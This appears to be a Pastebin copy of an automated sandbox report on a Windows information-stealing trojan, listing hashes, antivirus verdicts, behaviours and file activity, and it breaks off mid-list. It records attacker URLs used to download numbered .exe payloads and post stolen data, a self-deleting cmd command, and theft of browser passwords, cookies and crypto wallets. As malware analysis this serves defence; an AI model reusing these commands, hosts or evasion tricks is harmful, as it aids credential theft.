Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: "Malicious"
- [*] MalScore: 10.0
- [*] File Name: "Exes_99c013e0f90e934015ba6c8461f19188.exe"
- [*] File Size: 270848
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "94869576b92022ee8e17fd3d6663fdae331870eb9d83854787626b32f3ad84f8"
- [*] MD5: "99c013e0f90e934015ba6c8461f19188"
- [*] SHA1: "d544ee6203fe3aa4fc00b34f6fdd7d39a5a75228"
- [*] SHA512: "5c13cc6805735b8c5cafdaf28f724aef3531fe2cf6d40a98a418e86a437894722790c4a50b68b5945a63b35c51c626be502159cfd5ea1b42ee62692841baab0c"
- [*] CRC32: "8F8A0867"
- [*] SSDEEP: "6144:PSELKBp3KQtXWJno+MzgiZR0VenCYYhrN:PDIp3KQ1WJo+ypEe2N"
- [*] Process Execution: [
- "Exes_99c013e0f90e934015ba6c8461f19188.exe",
- "wincrbg.exe",
- "1186034710.exe",
- "2683410667.exe",
- "cmd.exe",
- "PING.EXE",
- "services.exe",
- "lsass.exe",
- "lsass.exe",
- "lsass.exe",
- "taskhost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "At least one process apparently crashed during execution",
- "Details": []
- },
- {
- "Description": "Attempts to connect to a dead IP:Port (3 unique times)",
- "Details": [
- {
- "IP": "172.217.165.14:443"
- },
- {
- "IP": "34.65.152.120:80"
- },
- {
- "IP": "172.217.164.225:443"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "wincrbg.exe tried to sleep 666 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details": [
- {
- "ioc": "http://crl.globalsign.net/root-r2.crl0"
- }
- ]
- },
- {
- "Description": "Network anomalies occured during the analysis.",
- "Details": [
- {
- "Anomaly": "'1.1.1.1' getaddrinfo with no actual connection to the IP."
- }
- ]
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "wincrbg.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe"
- },
- {
- "Process": "2683410667.exe -> cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe\""
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe"
- },
- {
- "binary": "C:\\Windows\\5858332514687312\\wincrbg.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- },
- {
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- },
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/1.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/2.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/3.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/4.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/5.exe"
- },
- {
- "suspicious_request": "http://34.65.152.120/gate/log.php"
- },
- {
- "suspicious_request": "http://34.65.152.120/gate/sqlite3.dll"
- },
- {
- "suspicious_request": "http://34.65.152.120/gate/libs.zip"
- },
- {
- "suspicious_request": "http://34.65.152.120/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "url": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "url": "http://193.32.161.77/1.exe"
- },
- {
- "url": "http://193.32.161.77/2.exe"
- },
- {
- "url": "http://193.32.161.77/3.exe"
- },
- {
- "url": "http://193.32.161.77/4.exe"
- },
- {
- "url": "http://193.32.161.77/5.exe"
- },
- {
- "url": "http://34.65.152.120/gate/log.php"
- },
- {
- "url": "http://34.65.152.120/gate/sqlite3.dll"
- },
- {
- "url": "http://34.65.152.120/gate/libs.zip"
- },
- {
- "url": "http://34.65.152.120/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate"
- }
- ]
- },
- {
- "Description": "Detects Sandboxie through the presence of a library",
- "Details": []
- },
- {
- "Description": "Detects SunBelt Sandbox through the presence of a library",
- "Details": []
- },
- {
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe:Zone.Identifier"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 14210604 times"
- }
- ]
- },
- {
- "Description": "Steals private information from local Internet browsers",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\5858332514687312\\wincrbg.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\5858332514687312\\wincrbg.exe"
- }
- ]
- },
- {
- "Description": "Collects information about installed applications",
- "Details": [
- {
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- },
- {
- "Program": "Microsoft Groove MUI 2013"
- },
- {
- "Program": "Microsoft Word MUI 2013"
- },
- {
- "Program": "Adobe Refresh Manager"
- },
- {
- "Program": "Microsoft Excel MUI 2013"
- },
- {
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- },
- {
- "Program": "Microsoft Outlook MUI 2013"
- },
- {
- "Program": "Microsoft Publisher MUI 2013"
- },
- {
- "Program": "Python 2.7.15"
- },
- {
- "Program": "Microsoft Office Proofing 2013"
- },
- {
- "Program": "Adobe Flash Player 29 ActiveX"
- },
- {
- "Program": "Python Launcher"
- },
- {
- "Program": "Microsoft Lync MUI 2013"
- },
- {
- "Program": "Microsoft InfoPath MUI 2013"
- },
- {
- "Program": "Python 2.7 PIL-1.1.7"
- },
- {
- "Program": "Microsoft DCF MUI 2013"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Windows\\5858332514687312"
- },
- {
- "file": "C:\\Windows\\5858332514687312\\wincrbg.exe"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
- }
- ]
- },
- {
- "Description": "File has been identified by 21 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "FireEye": "Generic.mg.99c013e0f90e9340"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "Symantec": "ML.Attribute.HighConfidence"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "UDS:DangerousObject.Multi.Generic"
- },
- {
- "AegisLab": "Trojan.Multi.Generic.4!c"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "SentinelOne": "DFI - Malicious PE"
- },
- {
- "Microsoft": "Trojan:Win32/Conteban.B!ml"
- },
- {
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "VBA32": "BScope.Trojan.Fuerboos"
- },
- {
- "MAX": "malware (ai score=93)"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GUCQ"
- },
- {
- "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
- },
- {
- "Fortinet": "Malicious_Behavior.SB"
- },
- {
- "AVG": "FileRepMalware"
- },
- {
- "CrowdStrike": "win/malicious_confidence_70% (W)"
- },
- {
- "Qihoo-360": "HEUR/QVM10.2.F6F3.Malware.Gen"
- }
- ]
- },
- {
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details": []
- },
- {
- "Description": "Operates on local firewall's policies and settings",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\Windows\\5858332514687312\\wincrbg.exe"
- },
- {
- "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe"
- }
- ]
- },
- {
- "Description": "Attempts to disable System Restore",
- "Details": []
- },
- {
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets"
- }
- ]
- },
- {
- "Description": "Harvests information related to installed mail clients",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- },
- {
- "key": "HKEY_CURRENT_USER\\Identities\\{0A258175-2D14-4D69-9955-E200F247250F}\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- }
- ]
- },
- {
- "Description": "Attempts to modify or disable Security Center warnings",
- "Details": []
- },
- {
- "Description": "Likely use of Domain Generation Algorithm (DGA)",
- "Details": []
- },
- {
- "Description": "Generates some ICMP traffic",
- "Details": []
- },
- {
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_99c013e0f90e934015ba6c8461f19188.exe:Zone.Iduentifier"
- },
- {
- "file": "C:\\Windows\\5858332514687312\\wincrbg.exe:Zone.Iduentifier"
- }
- ]
- },
- {
- "Description": "Collects information to fingerprint the system",
- "Details": []
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET TROJAN Generic -POST To file.php w/Extended ASCII Characters"
- },
- {
- "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
- },
- {
- "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
- }
- ]
- }
- ]
- [*] Started Service: [
- "VaultSvc",
- "WerSvc"
- ]
- [*] Executed Commands: [
- "C:\\Windows\\5858332514687312\\wincrbg.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe ",
- "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe\"",
- "C:\\Windows\\system32\\lsass.exe",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\PING.EXE ping 1.1.1.1 -n 1 -w 3000",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2220 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\""
- ]
- [*] Mutexes: [
- "850867085",
- "rc/user",
- "Local\\WERReportingForProcess2220",
- "Global\\\\xe5\\x88\\x90\\xc2\\x9c",
- "Global\\\\xed\\x95\\xb0\\xc7\\xa8",
- "WERUI_BEX64-cd449376f6223cf7a93dfe5d65a7144586b089d"
- ]
- [*] Modified Files: [
- "C:\\Windows\\5858332514687312\\wincrbg.exe",
- "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8BGZLQBV\\sqlite3[1].dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\P1kAlMiG2K",
- "C:\\Users\\user\\AppData\\Local\\Temp\\b7FzP5tM1Q",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BI6DSS92c3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1Apgjk9lVK",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\libs[1].zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\prldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\qipcap.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleHandler.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleMarshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\breakpadinjector.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\IA2Marshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldif60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\lgpllibs.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\libEGL.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssckbi.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\machineinfo.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Log.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\screen.png",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\b85eb07c-e4c2-4cc7-b68b-6975d428f4e0",
- "\\??\\Nul",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9CEE.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA00C.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA03C.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB78.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WER9CEE.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WERA00C.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WERA03C.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WERAB78.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\Report.wer.tmp"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_99c013e0f90e934015ba6c8461f19188.exe:Zone.Iduentifier",
- "C:\\Windows\\5858332514687312\\wincrbg.exe:Zone.Iduentifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\P1kAlMiG2K",
- "C:\\Users\\user\\AppData\\Local\\Temp\\b7FzP5tM1Q",
- "C:\\Users\\user\\AppData\\Local\\Temp\\BI6DSS92c3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1Apgjk9lVK",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ff-funcs.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Log.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\passwords.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\CC.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\chrome_cookie.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\firefox_cookie.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\chrome_autofill.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\machineinfo.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\screen.png",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleHandler.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleMarshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\breakpadinjector.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\IA2Marshal.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldif60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\lgpllibs.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\libEGL.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32_InUse.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssckbi.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\prldap60.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\qipcap.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\softokn3.dll",
